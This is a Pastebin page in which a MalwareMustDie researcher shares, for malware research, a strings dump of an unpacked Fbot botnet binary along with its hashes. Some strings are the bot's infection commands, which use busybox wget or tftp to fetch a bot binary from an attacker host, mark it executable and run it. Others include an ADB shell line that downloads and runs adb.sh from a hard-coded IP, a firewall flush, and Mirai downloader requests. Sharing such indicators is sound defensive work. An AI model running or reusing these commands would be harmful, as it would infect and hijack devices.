Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- The unpacked binary strings of recent Fbot binary
- bot.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
- statically linked, stripped
- MD5 (bot.x86_64) = ae975a5cdd9fb816a1e286e1a24d9144
- SHA1 (bot.x86_64) = a56595c303a1dd391c834f0a788f4cf1a9857c1e
- 31244 Feb 23 20:09 bot.x86_64*
- Dumped by @unixfreaxjp with "strings" - MalwareMustDie, NPO - malwremustdie.org
- ---- strings start--------
- 9xsspnvgc8aj5pi7m28p
- x86_64
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
- GET /bot.x86_64 HTTP/1.0
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
- \x%02x
- enable
- system
- linuxshell
- development
- iptables -F
- /bin/busybox FBOT
- /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
- /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
- /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
- arm5
- mips
- mipsel
- get: applet not found
- ftp: applet not found
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
- cho: applet not found
- /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
- retrieve
- /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
- /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
- ./retrieve; ./.t telnet; >retrieve; >.t
- ECHODONE
- 9xsspnvgc8aj5pi7m28p
- /var/
- /dev/
- C H+C(L9
- []A\A]
- SHH9
- Z[]A\A]
- C8H9C(v
- 9xsspnvgc8aj5pi7m28p
- x86_64
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
- GET /bot.x86_64 HTTP/1.0
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
- \x%02x
- enable
- system
- linuxshell
- development
- iptables -F
- /bin/busybox FBOT
- /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
- /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
- /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
- arm5
- mips
- mipsel
- get: applet not found
- ftp: applet not found
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
- cho: applet not found
- /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
- retrieve
- /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
- /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
- ./retrieve; ./.t telnet; >retrieve; >.t
- ECHODONE
- 9xsspnvgc8aj5pi7m28p
- /var/
- /dev/
- /mnt/
- /var/run/
- /var/tmp/
- /dev/netslink/
- SHH9
- Z[]A\A]
- C8H9C(v
- 9xsspnvgc8aj5pi7m28p
- x86_64
- x86_64
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
- GET /bot.x86_64 HTTP/1.0
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
- \x%02x
- enable
- system
- linuxshell
- development
- iptables -F
- /bin/busybox FBOT
- /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
- /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
- /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
- arm5
- mips
- mipsel
- get: applet not found
- ftp: applet not found
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
- cho: applet not found
- /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
- retrieve
- /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
- /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
- ./retrieve; ./.t telnet; >retrieve; >.t
- ECHODONE
- 9xsspnvgc8aj5pi7m28p
- /var/
- /dev/
- /mnt/
- /var/run/
- /var/tmp/
- /dev/netslink/
- /dev/shm/
- /bin/
- /etc/
- /boot/
- /usr/
- /sys/
- arm4
- arm6
- arm7
- nvalid
- ailed
- ncorrect
- enied
- rror
- oodbye
- ogin
- sername
- vrdvs
- ccount
- enter
- assword
- usybox
- ulti-call
- help
- CNXN
- host::features=cmd,shell_v2
- OPENX
- RPSW
- [^_]
- UWVS
- [^_]=
- ---------embedded downloader-part--------
- MIRAI
- GET /bot/bot.x86 HTTP/1.0
- .shstrtab
- .text
- .rodata
- .bss
- !'
- !'
- mips
- MIRAI
- GET /bot/bot.mips HTTP/1.0
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .mdebug.abi32
- mipsel
- MIRAI
- GET /bot/bot.mipsel HTTP/1.0
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .mdebug.abi32
- arm5
- MIRAI
- GET /bot/bot.arm5 HTTP/1.0
- aeabi
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .ARM.attributes
- arm7
- MIRAI
- GET /bot/bot.arm7 HTTP/1.0
- aeabi
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .ARM.attributes
- ---------end of embedded downloader-part--------
- ---------SSDP-scanner-------
- Host:
- M-SEARCH * HTTP/1.1
- Host:239.255.255.250:1900
- ST:ssdp:all
- Man:"ssdp:discover"
- MX:3
- stats
- objectClass0
- _services
- _dns-sd
- _udp
- local
- ----------end of SSDP------
- abcdefghijklmnopqrstuvwxyz0123456789
- ------crypted-config------------
- vte1
- a~be1
- r^__TREX^_
- ZTTA
- P]XGT1
- AC^R
- BT]W
- TIT1
- AC^R
- ERA1
- AC^R
- RFU1
- UPEP
- ]^RP]
- dBTC
- pVT_E
- |^KX]]P
- |PRX_E^BY
- x_ET]
- pAA]TfTSzXE
- zye|}
- ]XZT
- vTRZ^
- rYC^\T
- bPWPCX
- |^KX]]P
- fX_U^FB
- pAA]TfTSzXE
- zye|}
- ]XZT
- vTRZ^
- rYC^\T
- bPWPCX
- |^KX]]P
- fX_U^FB
- pAA]TfTSzXE
- zye|}
- ]XZT
- vTRZ^
- rYC^\T
- bPWPCX
- |^KX]]P
- fX_U^FB
- fX_U^FB
- pAA]TfTSzXE
- zye|}
- ]XZT
- vTRZ^
- rYC^\T
- bPWPCX
- yeea
- --------- end of crypted config-----------------
- /dev/null
- !#$$%%&&''(((())))****++++,,,,,,,,--------........////////
- __vdso_clock_gettime
- LINUX_2.6
- !"#
- !"#
- -0X+0X 0X-0x+0x 0x
- -+ 0X0x
- (null)
- 0123456789ABCDEF
- M(knN
- ---------GCC msgs------------
- Illegal byte sequence
- Domain error
- Result not representable
- Not a tty
- Permission denied
- Operation not permitted
- No such file or directory
- No such process
- File exists
- Value too large for data type
- No space left on device
- Out of memory
- Resource busy
- Interrupted system call
- Resource temporarily unavailable
- Invalid seek
- Cross-device link
- Read-only file system
- Directory not empty
- Connection reset by peer
- Operation timed out
- Connection refused
- Host is down
- Host is unreachable
- Address in use
- Broken pipe
- I/O error
- No such device or address
- Block device required
- No such device
- Not a directory
- Is a directory
- Text file busy
- Exec format error
- Invalid argument
- Argument list too long
- Symbolic link loop
- Filename too long
- Too many open files in system
- No file descriptors available
- Bad file descriptor
- No child process
- Bad address
- File too large
- Too many links
- No locks available
- Resource deadlock would occur
- State not recoverable
- Previous owner died
- Operation canceled
- Function not implemented
- No message of desired type
- Identifier removed
- Device not a stream
- No data available
- ---------- end of strings---------
- Research material of malwaremustdie.org, Feb 2020
- @unixfrexjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement